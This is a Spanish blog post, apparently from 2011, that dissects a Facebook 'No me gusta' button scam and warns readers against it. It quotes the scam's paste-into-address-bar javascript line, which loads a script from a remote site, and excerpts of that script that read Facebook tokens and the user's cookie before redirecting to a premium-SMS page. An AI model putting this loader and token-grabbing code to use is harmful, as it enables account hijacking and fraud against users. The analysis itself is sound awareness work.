Obviamente, no es cierto.
Todos también habréis visto lo siguiente:
Copiamos el código y nos dan las siguientes instrucciones: Para instalar el boton tienes que borrar todas las letras donde dice http://www.facebook.com (barra de direcciones) y hacer click derecho, PEGAR, y una vez aparezcan unas letras pulsar ENTER
Tenemos en el portapapeles almacenado el siguiente código (el que nos dicen que copiemos):
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bottonnomegusta.com/nomegusta.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
Otra vez lo mismo que antes, una web maliciosa con un supuesto código malicioso y un número aleatorio como parámetro de entrada...
var message = "Que bien, Facebook ha puesto por fin el boton NO ME GUSTA, si quieres tenerlo
tu tambien pulsa en el boton que sale aqui abajo, que dice Instalar NO ME GUSTA.";
var jsText = "http://www.bottonnomegusta.com";
var myText = "Instalar NO ME GUSTA";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);...
Y también con una dirección "para ganar dinero" (ya profundizaré en ello cuando acabe exámenes):
window.location = "http://www.bottonnomegusta.com/redirige_promo.php"
Así pues, lo mismo que la entrada anterior, se puede ver que en las dos primeras variables se
almacenan nuestros dos tokens "post_form_id" y "fb_dtsg", y que en la tercera variable almacena
parte de la información de nuestra cookie (otra vez mala pinta...)
Otra vez estamos ante un ataque CSRF, posiblemente sean los mismos que antes.
Así que, no me canso de repetirlo: ¡No os fieis de este tipo de aplicaciones! ----------------
modifico:[18-05-2011]
Acabo de ver otra versión, sale esto:
"Como mola :) xD Face puso el boton NO ME GUSTA,
yo ya le doy a todo No me gusta jaja si quieres tenerlo tu tambien
pulsa en el texto que sale aqui abajo, que pone NO ME GUSTA.";
Y nos piden que copiemos este script:
Si analizamos el fichero theb.js al final del código se ve esto otro:
Y direis... ¿Y quién se fia de poner su número por internet? Pues muy poca gente, pero esa dirección habrá sido visitada por millones de personas y sólo con que un 0.1% haya ingresado su número ya tienen la paga del mes más que ganada!
Si analizamos el fichero theb.js al final del código se ve esto otro:
alert("Termine el ultimo paso y le enviaremos a su telefono laclave para activar el boton."); window.location = "http://thebutonsfacebook.com/redirige_promo.php"Aquí está la respuesta al por qué de todo este alboroto: Al final nos redireccionan a esta web para que ingresemos nuestro número de telefono y así poder cobrarnos unos 50€ al mes por enviarnos sms.
Y direis... ¿Y quién se fia de poner su número por internet? Pues muy poca gente, pero esa dirección habrá sido visitada por millones de personas y sólo con que un 0.1% haya ingresado su número ya tienen la paga del mes más que ganada!
Si entramos en la dirección de redirige_promo.php se puede ver esto: "Responsable del servicio: Datatalk Comunicaciones S.L" Una empresa de Madrid. Lo que no sé si habrá sido esta empresa la que ha creado la aplicación viral para facebook o si habrá sido una subcontrata que cobraba más por incentivos y quería ganar dinero de una forma rápida... Eso ya a la imaginación de cada uno.... =)
4 comentarios:
guaoooo..impresionante...yo primero busque la info..
muchas gracias amigo...
increíble la cantidad de gente que se cree eso del boton no me gusta, dan pena
@Anónimo, Bajo mi punto de vista NO es dar pena, simplemente hay gente que no está documentada sobre el tema.
Muy bien Rafa me gusta que algien se preocupe por los demas e investige para enseñarnos lo q de verdad es o no es
Publicar un comentario